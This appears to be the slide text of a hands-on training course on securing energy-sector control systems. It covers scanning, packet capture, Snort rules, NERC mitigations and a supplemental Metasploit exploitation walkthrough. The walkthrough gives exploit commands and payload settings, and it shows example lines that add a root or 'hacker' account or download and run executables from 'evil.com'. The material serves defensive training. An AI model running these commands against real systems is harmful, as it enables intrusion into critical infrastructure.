NSTB Enhancing Control Systems Security in the Energy Sector
Plug-in Options (for efficiency)
Backdoors
CISCO
Database
FTP
Gain a shell remotely
Gain root remotely
General
Misc
RPC
Remote file access
Settings
Web Server
Windows
Windows: MS Bulletins
Windows: User mgmt.
Port Scanner: Ping
NSTB Enhancing Control Systems Security in the Energy Sector
Nessus SCADA Plugins (not on CD)
Areva/Alstom Energy Management
System
DNP3 Binary Inputs Access
DNP3:
Modicon PLC CPU Type
PLC Default FTP Password
PLC Embedded HTTP Server
PLC HTTP Server Default
Username/Password
PLC Telnet Server
IO Scan Status
Modbus Slave Mode
Link Layer Addressing DNP3
Unsolicited Messaging
ICCP
ICCP/COTP Protocol
ICCP/COTP
TSAP Addressing
LiveData ICCP Server
Matrikon OPC Explorer
Matrikon OPC Server for
ControlLogix
Matrikon OPC Server for Modbus
Modbus/TCP:
Coil Access
Discrete Input Access Programming
Function Code Access
Modicon:
Modicon PLC Web Password
Status
National Instruments Lookout
OPC DA Server/OPC
Detection/OPC HDA Server
Siemens S7-SCL
Siemens SIMATIC PDM - SiemensTelegyr ICCP Gateway - Sisco
OSI/ICCP Stack -.
Sisco OSI Stack Malformed Packet
Vulnerability
Tamarack IEC 61850 Server
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise Start Nessus
You must start the Nessus Client and Server from the K-Menu
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise Nessus Client Logon
Nessus servers:
Localhost
User/pass: knoppix
Remote
User/pass: nessus
Corp -1.2.3.64
DMZ 192.168.10.64
Control 192.168.1.64
192.168.2.64
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise Scan and Save Report(s)
1.
2.
3.
Set scan options and select
desired plugins
Set target range (Nmap style)
Start the scan
Once a scan has completed, view the results in this window
NSTB Enhancing Control Systems Security in the Energy Sector
Review
Nessus is a network vulnerability scanner that can identify
currently connected hosts on your network and any
vulnerable services / applications that are running.
What information does Nessus provide that you didnt
find with Nmap?
What different types of security problems did you
discover?
Did you find any false-positives?
How did you determine if a finding was a false-positive?
What NERC requirements might Nessus be useful
for?
NSTB Enhancing Control Systems Security in the Energy Sector
Analyze Communications: tcpdump
Tcpdump prints out the headers of packets on a
network interface that match the Boolean expression.
It can also be run with the -w flag, which causes it to
save the packet data to a file for later analysis, and/or
with the -r flag, which causes it to read from a saved
packet file rather than to read packets from a
network interface.
In all cases, only packets that match the expression will
be processed by tcpdump.
www.tcpdump.org
A Very Efficient & Clean Way for Creating a
Customized Wire Tap on Your Network.
NSTB Enhancing Control Systems Security in the Energy Sector
TCPDump
Some common options for TCPdump:
-s <len>
The snap length of the packet capture
-C <size>
Limit output file to size (in MB)
-F <file>
Input filter file
-i <lan>
Network interface to sniff
-w <file>
Output PCAP file
tcpdump s 0 i eth0 w filename.Pcap
NSTB Enhancing Control Systems Security in the Energy Sector
Analyze Communications: Wireshark
Wireshark (formerly Ethereal) is a GUI network protocol
analyzer. It lets you interactively browse packet data
from a live network or from a previously saved capture
file. WSs native capture file format is libpcap format,
which is also the format used by tcpdump & various
other tools.
Wireshark is THE Standard for Performing
Network Protocol Analysis.
NSTB Enhancing Control Systems Security in the Energy Sector
Wireshark
NSTB Enhancing Control Systems Security in the Energy Sector
Security Note:
In practice, it is advised that traffic monitoring be done with
tcpdump and the associated .pcap file be used in
Wireshark for analysis.
This is due to security issue with Wireshark, which leaves
your PC vulnerable if used on active networks. Rule of
thumb:
Capture with tcpdump - Analyze with Wireshark
NSTB Enhancing Control Systems Security in the Energy Sector
SCADA LAN Traffic
NSTB Enhancing Control Systems Security in the Energy Sector
Distributed Network Protocol (DNP)
An open protocol for communications between
substation equipment and front-end devices
Heavy use of Cyclic Redundancy Checks (CRCs)
embedded in data packets
Historically used over serial communications, now being
used over TCP/IP
Designed for use in harsh environments
Designed for reliability
No confidentiality or integrity checks explicitly included
NSTB Enhancing Control Systems Security in the Energy Sector
DNP3
Built on OSI layers 1,2, & 7
Conversations typically occur
between a DNP3 Master and
DNP3 Outstations
Data payloads contain a pair
of CRC octets for every 16
data octets
Usually found on TCP port
20000
DNP3 Users Code
DNP3 Application Layer
Pseudo Transport Layer
DNP3 Link Layer
TCP
IP
Ethernet
DNP3 Header
TC/UDP Header
IP Header
Ethernet Header
TH
ASDU + CRCs
TCP/UDP Data
IP Data
Ethernet Data
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise Start Wireshark
Launch Wireshark from the K-Menu
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise Analyze Saved File
Use Filter Expressions to Find Traffic
e.g.
tcp.port == 80
FTP
ip.addr == 192.168.1.10
Open the provided PCAP file for analysis
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise Analyze Live Traffic
Select the network interface
Capture traffic on your network for analysis
NSTB Enhancing Control Systems Security in the Energy Sector
Review
Tcpdump and Wireshark are the defacto standards for
network sniffing and analysis. These two tools provide
the ability to tap and analyze Ethernet SCADA
protocols.
What network traffic did you find?
What SCADA specific protocols were found? What did
you learn?
Did you find plain-text information?
What are the limitations of Wireshark?
What NERC requirements might Wirehark be useful
for?
NSTB Enhancing Control Systems Security in the Energy Sector
Network Compromise
Metasploit provides useful information to people who
perform penetration testing, IDS signature
development, and exploit research. This project was
created to provide information on exploit techniques
and to create a useful resource for exploit developers
and security professionals. The tools and information
on this site are provided for legal security research and
testing purposes only. Metasploit is a community
project managed by Metasploit LLC.
http://www.metasploit.com/
An open-source hacking toolkit
NSTB Enhancing Control Systems Security in the Energy Sector
Metasploit Network Compromise
The Metasploit Framework
Msfconsole (interactive command-line control)
Msfcli (useful for scripting metasploit commands)
Msfpayload (shellcode and executable generation)
Msfgui (point-and-click hacking)
Msfweb (web-based GUI)
Refer to supplemental slides for additional instructions
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise - Start the Metasploit Console
1.
2.
3.
Start a root shell
cd to the /INL/metasploit/framework-3.1
Execute the metasploit console using the
./msfconsole command
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise - The Basic Exploit Process
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
show exploits
use exploit <full exploit name>
show options
set <opt name> <value>
show payloads
show options
set <opt name> <value>
set TARGET <value>
set PAYLOAD <full payload name>
exploit
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise - Interacting With Hosts
Standard reverse and bind
shell payloads
Meterpreter payloads
Use the sessions command to interact with exploited hosts
NSTB Enhancing Control Systems Security in the Energy Sector
Exercise - Interacting With Hosts
VNC payloads
VNC payloads provide desktop access to exploited hosts (very noisy)
NSTB Enhancing Control Systems Security in the Energy Sector
Review
Metasploit is an open-source exploitation framework for
script-kiddies and network auditors.
What exploits worked?
Was it easy or hard?
Should we worry about Metasploit on our networks?
How can Metasploit be used in a defensive manner?
Can Metasploit be used to meet any NERC
requirements?
NSTB Enhancing Control Systems Security in the Energy Sector
Rotate to the Next Network
Corporate Network DMZ
DMZ Control Network
Control Network Corporate Network
Dont forget to re-run the pump command
NSTB Enhancing Control Systems Security in the Energy Sector
Follow the Process You Just Learned
1.
Network Discovery (nmap)
2.
Vulnerability Analysis (nessus)
3.
Network Traffic Analysis (tcpdump)
4.
Network Exploitation (metasploit)
NSTB Enhancing Control Systems Security in the Energy Sector
Defense,
Detection and Analysis
NSTB Enhancing Control Systems Security in the Energy Sector
Application and Services Security
Discovery and Analysis
Be curious about software used on your systems
Investigate as a poorly informed user
Investigate as a bad guy (hacker)
Analyze what applications & services are available on
your critical networks
Check database user privileges & database service
configuration
Examine the communication protocols in use
DNS Traffic
Webserver traffic
Proprietary Traffic
NSTB Enhancing Control Systems Security in the Energy Sector
Application and Services Security
Least Privileges
The principle of least privilege requires that a user be
given no more privilege than necessary to perform a job.
Ensuring least privilege requires identifying what the
users job is, determining the minimum set of privileges
required to perform that job, & restricting the user to a
domain with those privileges & nothing more. By denying
to subjects transactions that are not necessary for the
performance of their duties, those denied privileges
cannot be used to circumvent the organizational security
policy.1
1. Integrity in Automated Information Systems. National Computer Security, Center, September 1991.
Least privileges may not be possible due to technology limitations
User (in this example) may be a computer
NSTB Enhancing Control Systems Security in the Energy Sector
Application and Services Security
Least Privileges
An Important Note
with Respect to Least Privileges:
This methodology does not remove vulnerabilities from a
system. It only prevents exploitation from obtaining immediate
superuser access.
Administrators still need to care for their systems
to prevent escalation of privileges when unauthorized
access is gained.
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Snort is an open source network detection system (IDS) capable of
performing real-time traffic analysis and packet-logging on IP networks. It
can perform protocol analysis, content searching & matching and can be
used to detect a variety of attacks and probes, such as buffer overflows,
stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts
and more.
Snort uses a flexible rules language to describe traffic that it should
collect or pass, as well as a detection engine that uses a modular plug-in
architecture.
Snort has three primary uses. It can be used as a straight packet sniffer
like tcpdump, a packet logger (useful for network traffic debugging and
so), or as a full-blown network intrusion detection system.
www.webopedia.com
Network Intrusion Detection Is a Great Way of
Monitoring What Communication You KNOW
Should Be ALLOWED on Your Network.
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Expectations
What they can do for you
Forewarning
Detect activity that are precursors to real attacks
Allow for reaction before real attack
Post-Attack Analysis
Computer forensic investigation
Intrusion post-mortem
Situational Awareness
Develop knowledge of typical behavior
What they cant do
Tell you if the system was exploited
Tell you what happened on the system console
Do analysis
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
IDS vs. IPS Placement
Network A
Network A
Firewall
Firewall
IDS
Protected Network
IPS
Protected Network
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Anomaly Detection
Teach detector what is normal network traffic
What if learning period includes attacks?
Detects deviations from normal behavior
User login behaviors
File accesses
More difficult to fake out
Needs no foreknowledge of attack signatures
May raise more false positives
WHAT is normal, anyway?
WHEN does normal become abnormal?
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
IDS Signatures
Policy Signatures
What should be happening on your network?
Policy signatures detect unexpected activity.
Security Signatures
Signatures that identify known vulnerabilities in your network.
Watch security notices and write signatures based on relevant
details like port numbers, specific content, and propagation
behaviors
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Signature vs. Anomaly Detection
Signature
Anomaly
Watches for specific
events
Watches for changes in
trends
Only looks for what
it's been told
Learns from gradual
changes
Can deal with
unknowns, but any
attack is subject to
false negative
Can deal with any
known threat
Unaware of network Sensitive to changes in
configuration changes network devices
Highly objective
inspection
Subjective, prone to
misinterpretations
Predictable behavior Unpredictable behavior
Easy to tune
manually
Must trust the system
completely
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Sensor & Node Placement
Borders
All points of presences
DMZs
Either side of firewalls
Outside provides intelligence gathering/forewarning
Inside detects attacks
Internal Subnets
Between campuses
On networks with sensitive information
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Sensor & Node Placement
Meters
Breakers
Switches
Transformers
Relays
RTU/PLC
Vendor
Modem
Front End
Processor
Applications
Server
Configuration
Server
Database
Server
Historian
HMI
Computers
Engineering
Workstation
SERIE
S
Substations
SCADA LAN
MODEM
Pool
VENDORS
ICCP
PEERS
ICCP
Server
Historian
Corporate
PBX
WWW
Server
DMZ LAN
SCADA
Firewall
Communications
Servers
Business
Servers
Web
Applications
Business
Servers
Workstations
DNS
Server
IDS/IPS
IDS/IPS
`
Internet
CORPORATE LAN
Communications
Corporate
Firewall
Host Intrusion & Application Log Detection Systems
Network Intrusion Detection & Prevention Systems
Virus, Spyware, & Bot Detection Systems
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Example Snort Configuration
We need new rules
for the control LAN
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Legal Traffic Laws
SIGNATURE ID
1000001
Message
Unauthorized communications with HMI
Rule
alert tcp 192.168.0.97 any <> ![192.168.0.3,192.168.10.21] any
(msg:"HMI talking to someone other than PLC or RTU - NOT
ALLOWED"; priority:1; sid:1000000; rev:1;)
Summary
An unauthorized system attempts to connect to the HMI
Impact
Compromise of Control
Information
The HMI has a limited number of hosts with which it should
communicate. Most SCADA/DCS networks have a limited number
of HMI or other control devices that should exchange information
to/from one another. An adversary may attempt to compromise
an HMI to negatively affect the process being controlled.
Affected
Systems
PLC;RTU;HMI;DMZ-Web
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
A Network Canary
SIGNATURE ID
1000002
Message
Unauthorized IDS communications
Rule
alert tcp 192.168.0.41 any <> any any (msg:"IDS talking to
someone - NOT ALLOWED"; priority:1; sid:1000002; rev:1;)
Summary
An system attempts to connect to the IDS sensor
Impact
Compromise of Monitoring; Unauthorized network activity
Information
No device on the control network should communicate with the
IDS sensor. This rule is used as a canary for monitoring for
unauthorized traffic on the control network.
Affected
Systems
All
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Monitor Special Services
SIGNATURE ID
1000003
Message
Unauthorized to RTU Telnet/FTP
Rule
alert tcp !$PCS_HOSTS any -> 192.168.0.3 23 (msg:
Unauthorized connection attempt to RTU Telnet;
flow:from_client,established; content:GET; offset:2; depth:2;
reference:DHSINLroadshow-IDStoHMI1;classtype:misc-activity;
sid:1000003; rev:1; priority:1;)
Summary
An control LAN resource attempts to connect to the RTU Telnet
server
Impact
Compromise of Control ; Reconnaissance
Information
No device other than an EWS will need to communicate to an
embedded RTU Telnet server. Most SCADA/DCS networks have a
limited number of EWS or other control devices that should
exchange information to/from a RTU. An adversary may attempt
to compromise a RTU to negatively affect the process being
controlled.
Affected
Systems
RTU
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Audit Network Config Changes
SIGNATURE ID
1000004
Message
Unauthorized to firewall configuration ports
Rule
alert tcp any any <> 192.168.0.254 443 (msg:"Somebody looking
at firewall-443"; sid:1000007; rev:1;)
alert tcp any any <> 192.168.0.254 80 (msg:"Somebody looking
at firewall-80"; sid:1000008; rev:1;)
Summary
An system attempts to connect to the firewall using one of the
configuration ports
Impact
Compromise of network resource ; Reconnaissance
Information
Only authorized hosts are allowed to connect to the firewall from
the control system network.
Affected
Systems
Firewall
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Intrusion Detection
Custom Rules in Action
NSTB Enhancing Control Systems Security in the Energy Sector
Network Architecture
Common Firewall Problems
Huge rule set and complex rules
Rules not commented
Generic or simplified rules
Old/temporary rules not removed
Rules exist, but nobody knows why
Logging not enabled
In some cases, firewall is subverted by direct connection
Same firewall rules used on corporate and internal network
NSTB Enhancing Control Systems Security in the Energy Sector
Network Architecture
Outbound Firewall Rules
A Good Question that Needs to Be Addressed is:
Should the implicit outbound rule on the firewall be allowed
on the SCADA network?
Should Hosts Be Able to Access Networks Other
than Their Own?
Do the SCADA Hosts Need Default Gateways?
Outbound Exceptions Should Be Created Just Like
Inbound Exceptions
NSTB Enhancing Control Systems Security in the Energy Sector
Network Architecture
Network Segmentation
Similar to the IT environment
What users have access to the financial systems?
What hosts should have access to core SCADA servers?
Segmentation should be performed by a firewall or a
router with ACLs
NSTB Enhancing Control Systems Security in the Energy Sector
Network Architecture
Auditing & Analysis
Argus Generates network flow information from PCAP
files
Afterglow Creates pretty network maps from flow data
RAT (Router Audit Tool) Audits router configuration
files
Argus - http://www.qosient.com
RAT - http://www.cisecurity.org
Afterglow - http://afterglow.sourceforge.net
NSTB Enhancing Control Systems Security in the Energy Sector
Logging and Log Analysis
Operating Systems and Applications provide a wealth
of logging information. This information can be used
to monitor the health of the system and potentially
detect malicious activity.
Log Correlation Can Help Locate Problems
NSTB Enhancing Control Systems Security in the Energy Sector
Logging and Log Analysis
Log Sources
Typical IT logs
Firewall, IDS, Antivirus, Syslog (*nix), Windows Event Log
Application Logs
SCADA, HTTP, database
Combine and Correlate Information
Network usage, CPU loads, access, debug, anomaly detection
NSTB Enhancing Control Systems Security in the Energy Sector
Logging and Log Analysis
Available Tools
GFI tools (www.gfi.com)
Syslog (www.syslog.org)
BASE (base.secureideas.net)
Kiwi (www.kiwisyslog.com)
Swatch (swatch.sourceforge.net)
Log Correlation is an Art
NSTB Enhancing Control Systems Security in the Energy Sector
Modern Hardware and Software Defenses
New Features
Hardware
No eXecute (NX,DEP,XD) bit Introduced with the AMD64
processor and then followed by the Pentium 4 (Prescott)
Software (Operating Systems)
Stack randomization
Library randomization
Heap Corruption Detection
Heap Randomization
Host Firewall
Software (Compilers)
/GS Stack Overrun Detection
/SafeSEH Exception Handler Protection
ASLR Address Space Layout Randomization
DEP/NX/XD NX Compliance
http://msdn.microsoft.com/en-us/library/bb430720.aspx
NSTB Enhancing Control Systems Security in the Energy Sector
Review
Defense is difficult
Analyze the applications and services on your network
Perform some basic intrusion detection
Review and modify your network architecture
Although painful, someone has to review all of the logs
If possible, upgrade to modern hardware and software
NSTB Enhancing Control Systems Security in the Energy Sector
Open Discussion
NSTB Enhancing Control Systems Security in the Energy Sector
The End
NSTB Enhancing Control Systems Security in the Energy Sector
Supplemental Slides
NSTB Enhancing Control Systems Security in the Energy Sector
Metasploit Walkthrough
NSTB Enhancing Control Systems Security in the Energy Sector
Conventions
red text is something you should type into msfconsole
<blue text in angle brackets> is an argument you need to
fill in
NSTB Enhancing Control Systems Security in the Energy Sector
User interface options
msfconsole
most mature
for command-line ninjas, this is the most comfortable
msfweb
slower
slightly more intuitive to a novice
msfgui
still in beta
will probably change drastically in the next release
NSTB Enhancing Control Systems Security in the Energy Sector
msfconsole
use exploit/windows/smb/ms06_040_netapi
this exploit works on all Windows hosts before XP SP2, 2000 SP4
the tab key is your friend
NSTB Enhancing Control Systems Security in the Energy Sector
msfconsole
show options
set RHOST <target IP address>
e.g.: set RHOST 192.168.0.97
NSTB Enhancing Control Systems Security in the Energy Sector
msfconsole
show payloads
only shows payloads for the target architecture
set PAYLOAD <your payload>
e.g.: set PAYLOAD windows/shell_bind_tcp
again, tab is your friend
NSTB Enhancing Control Systems Security in the Energy Sector
Payload types
shell
for Windows this means cmd.exe
for Unix, /bin/sh
Pros
Cons
Simple
Reliable
Often triggers IDS
Requires much knowledge
NSTB Enhancing Control Systems Security in the Energy Sector
Payload types
exec
execute a single shell command
e.g.: echo toor::0:0::/root:/bin/sh >> /etc/passwd
e.g.: net user hacker /add
Pros
Cons
Simple
Sometimes too simple
Requires much knowledge
NSTB Enhancing Control Systems Security in the Energy Sector
Payload types
upexec
retrieves an executable from the attacker and runs it
similar to nc evil.com 4444 >foo.exe; foo.exe
Pros
Cons
Good way to run a rootkit
Requires outside executable
NSTB Enhancing Control Systems Security in the Energy Sector
Payload types
download exec
downloads an executable and runs it
equivalent to wget evil.com/foo.exe; foo.exe
Pros
Cons
Good way to run a rootkit
Requires outside executable and
a webserver to host it
NSTB Enhancing Control Systems Security in the Energy Sector
Payload types
vncinject
starts a vnc server on the target and connects to it
Cadillac of Windows payloads
Pros
Cons
Pretty
Makes people say, Oooh
Outstanding when HMI is the
target
Slow, sometimes painfully
Noisy (lots of traffic)
NSTB Enhancing Control Systems Security in the Energy Sector
Payload types
meterpreter
If vncinject is the Cadillac of Windows payloads, this is the
Porsche
Pros
Cons
Powerful
Versatile
Entirely in memory
Requires commandline interface
NSTB Enhancing Control Systems Security in the Energy Sector
Payload Delivery Methods
reverse_tcp
attempts to connect back to you
Pros
Cons
Can be used when target is
behind a firewall
Network Address Translation
(NAT) breaks it
NSTB Enhancing Control Systems Security in the Energy Sector
Payload Delivery Methods
bind_tcp
the target listens for you to connect
Pros
Cons
Smaller
Can be used when you are
behind NAT
Firewalls often get in the way
NSTB Enhancing Control Systems Security in the Energy Sector
other useful msfconsole commands
show exploits
gives a long list of the exploits that metasploit knows about (more
than 250)
search smb
much shorter list, modules with smb in their name or description
case insensitive regular expression
NSTB Enhancing Control Systems Security in the Energy Sector
Back to msfconsole
set PAYLOAD payload/windows/meterpreter/reverse_tcp
tab is still your friend
show options
should now have LHOST and LPORT
set LHOST <your IP address>
the default LPORT of 4444 is fine
NSTB Enhancing Control Systems Security in the Energy Sector
The moment weve all been
waiting for
exploit
triggers the vulnerability and sends the payload
if all went well, you just 0wned the target
sessions -i 1
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb -- exploits
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
select a target
the first one in the list is usually the most reliable or most common
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
select a payload
refer to the discussion above about payloads
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
set options to your liking
click Launch Exploit button
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb launch exploit
NSTB Enhancing Control Systems Security in the Energy Sector
msfweb
bask in the glow of a command shell
NSTB Enhancing Control Systems Security in the Energy Sector
NSTB Enhancing Control Systems Security in the Energy Sector
VNC
If, as in the previous example, a VNC window is not
logged in, you can type explorer.exe into your cmd shell
to get a full desktop
NSTB Enhancing Control Systems Security in the Energy Sector
other useful msfconsole commands
show exploits
gives a long list of the exploits that metasploit knows about (more
than 250)
search smb
much shorter list, modules with smb in their name or description
case insensitive regular expression
NSTB Enhancing Control Systems Security in the Energy Sector
other useful msfconsole commands
help
sessions
NSTB Enhancing Control Systems Security in the Energy Sector
NERC
Mitigation Strategies
NSTB Enhancing Control Systems Security in the Energy Sector
NERC Top 10 Vulnerabilities - 2007
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Inadequate Policies, Procedures, and Culture Governing Control System
Security
Inadequately designed control system networks that lack sufficient
defense-in-depth mechanisms
Remote access to the control system without appropriate access control
System administration mechanisms and software used in control systems
are not adequately scrutinized or maintained.
Use of inadequately secured wireless communication for control
Use of a non-dedicated communications channel for command and
control and/or inappropriate use of control system network bandwidth for
non-control purposes
Insufficient application of tools to detect and report on anomalous or
inappropriate activity
Unauthorized or inappropriate applications or devices on control system
networks
Control systems command and control data not authenticated
Inadequately managed, designed, or implemented critical support
infrastructure
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 1 Mitigations
Inadequate Policies, Procedures, and Culture Governing Control
System Security
Foundational
Assign a senior manager with overall responsibility for
leading and managing the entity's implementation of, and
adherence to, robust control system security practices
Document and implement a cyber security policy that
represents managements commitment and ability to secure its
critical infrastructure assets. Periodically review and update.
Develop security procedures and implementation
guidance to enable employees to implement specific
elements of the cyber security policy.
Develop risk management plan that identifies and
documents a risk-base assessment methodology to identify its
critical assets. Periodically review and update as necessary
(particularly when operational changes result in new critical
assets).c
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 1 Mitigations
Inadequate Policies, Procedures, and Culture Governing Control
System Security - continued
Intermediate
Ensure policies and procedures comprehensively include
other parts of the enterprise, vendors, or contractors as
appropriate.
Form a teaming arrangement between information
technology and control system operations staff to facilitate
effective knowledge sharing.
Provide briefings to executive management detailing
control system risk posture.
Share industry best practices in security-policy structure
and topics
Advanced
Develop and implement a process for continuous
improvement and enforcement of policies and procedures
governing control system security.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 1 Mitigations
Inadequate Policies, Procedures, and Culture Governing Control
System Security - continued
Advanced continued
Provide periodic hands-on cyber security training for
control system personnel taught by applicable vendor or
consulting firm.
Perform periodic security-awareness drills and audits.
Include security-related roles, responsibilities, authorities,
and accountabilities in staff annual review and appraisal
processes.
Coherent and meaningful policies are understood and
internalized by all employees so that they are continually
working to achieve these goals as part of their daily task
activities.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 2 Mitigations
Inadequately designed control system networks that lack
sufficient defense-in-depth mechanisms
Foundational
Develop and periodically update a list of critical assets
determined through an annual application of a risk-based
assessment methodology.
Implement electronic perimeters. Disconnect all
unnecessary network connections following the NERC
security guideline Control System - Business Network
Electronic Connectivity Guideline.
Implement strong procedural or technical controls at the
access points to the electronic security perimeter to ensure
authenticity of the accessing party, where feasible (e.g.
restrict remote access to field devices).
Include detailed security requirements in all design
specifications.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 2 Mitigations
Inadequately designed control system networks that lack
sufficient defense-in-depth mechanisms continued
Intermediate
Implement compartmentalization design concepts to
establish electronic security perimeters and cyber asset
separation necessary for a defense-in-depth architecture.
Use special purpose networks with minimal shared
resources to transfer data between control system and noncontrol system networks.
Replace devices as necessary to attain desired security
functionality, or implement compensating security measures if
replacement is not feasible.
Advanced
Design specifications include comprehensive security
standard references providing in-depth security coverage.
Implement virtual local area networks (VLANs), private
VLANs, intrusion prevention, intrusion detection, smart
switches, secure dial-up access, etc.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 2 Mitigations
Inadequately designed control system networks that lack
sufficient defense-in-depth mechanisms continued
Advanced - continued
Implement host based protection in conjunction with
network based protection.
Implement physical security of network access points,
including access control, or electronic methods for restricting
access (e.g., MAC address filtering).
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Foundational
Implement and document the organizational processes
and technical and procedural mechanisms for control of
electronic access at all electronic access points to the
electronic security perimeter(s).
Maintain complete and current maps of control system
topology. Identify and track up-to-date status for all access
points
Perform background checks or risk assessments on
employees with access to sensitive systems. Ensure vendors
and contractors have implemented similar procedures.
Develop and implement policy for managing user and
system access, including password policies.
Change all default passwords where possible.
Do not allow unauthenticated remote access to the control
system.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Foundational - continued
Use secure communication technology when the internet is
used for sensitive communications (e.g., VPN, SSH, SSL,
IPSEC).
External connections should be controlled and secured
with an authentication method, firewall, or physical
disconnection when not in use. This secure method should be
established and monitored in accordance with the established
security policy and procedures.
Follow the NERC security guideline Securing Remote
Access to Electronic Control and Protection Systems.
Intermediate
Define levels of access based on roles or work
requirements. Assign access level and unique identifiers for
each operator. Isolate user access to compartmentalized
areas based on specific user needs. Log system access at all
levels.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Intermediate - continued
Use multifactor authentication (e.g., two-factor, nonreplayable credentials).
Implement a procedure whereby remote access to the
control systems must be enabled by appropriately authorized
personnel.
Perform regular audits of remote access methods
Periodically perform a passive network mapping and/.or
conduct war dialing to find undocumented external
connections.
Implement a network-intrusion detection system to identify
malicious network traffic, scan systems for weak passwords,
and separate networks physically.
Include security access issues in contractual agreements
with vendors or contractors.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 3 Mitigations
Remote access to the control system without appropriate
access control
Advanced
Design access levels into the system that restricts access t o
configuration tools and operating screens as applicable.
Segregate development platforms from run-time platforms
Use proximity based authentication technology, such as
RFID tokens.
Implement protocol intrusion detection and active response
technology.
Cautionary note:
The use of active response technology systems should be
carefully considered. The technology should be engineered for
application in a control system environment where failsafe
modes have been adequately considered for safety and
operational considerations.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Foundational
Inventory all software and hardware used in the control
system.
Develop and implement hardware and software quality
assurance policy, including purchase, maintenance, and
retirement, particularly how sensitive information is removed
before reapplication or disposal.
Establish a robust patch-management process, including
tracking, evaluating, testing and installing applicable cyber
security patches for hardware, firmware, and software,
following the NERC security guideline Patch Management for
Control Systems.
Document and implement a process for the update of antivirus and malware prevention signatures. The process must
address testing and installing the signatures on a periodic
basis
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Foundational - continued
Periodically review authorization rights and access
privileges to ensure consistency with job function.
Revoke authorization rights and access privileges of users
upon termination or transfer.
Remove, disable, or rename administrator, shared and
other generic account privileges including factory default
accounts where possible.
Intermediate
Evaluate and characterize applications. Remove or
disconnect unnecessary functions.
Maintain full system backups and have procedures in place
for rapid deployment and recovery. Maintain a working test
platform and procedures for evaluation of updates prior to
system deployment.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Intermediate continued
Work with vendors to include the ability to validate the
integrity of new code releases.
Use screening technology at network entry points to prohibit
the spread of malware.
Establish methods, processes, and procedures that
generate logs of sufficient detail to create historical audit trails
of individual user account access activity.
Advanced
Automated removal of user accounts tied to badge systems
or human resources upon employee termination .
Work with vendors to develop and implement a formal
software assurance process to verify proper functionality
through testing, certification, and accreditation processes
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 4 Mitigations
System administration mechanisms and software used in
control systems are not adequately scrutinized or
maintained.
Advanced continued
Perform systematic vulnerability testing.
Limit user accounts with administer or root privileges when
practical.
Limit shared accounts to the extent practicable, except when
necessary for safety or operational considerations.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 5 Mitigations
Use of inadequately secured wireless communication for control
Foundational
Perform periodic risk assessment of all wireless
implementations, including denial of service considerations.
Treat all wireless connections as remote access points.
Document and implement a program for managing access to
sensitive systems.
Establish a security policy on where and how wireless may
be used in the control system. For example, use of wireless for
critical control applications should be discouraged.
Implement encrypted wireless communication where
possible, e.g., WiFi Protected Access 2 (WPA2).
Use non-broadcast server set identifications (SSIDs).
Treat all routable protocol wireless connections as nonprivate communication paths.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 5 Mitigations
Use of inadequately secured wireless communication for control
Foundational - continued
Treat all routable protocol wireless connections as non-private
communication paths.
Implement procedure for disabling WiFi-capable equipment when
it is connected to critical networks when wireless use is not intended,
including laptops being introduced in control center environments or
substations.
Intermediate
Implement 802.1x device registration.
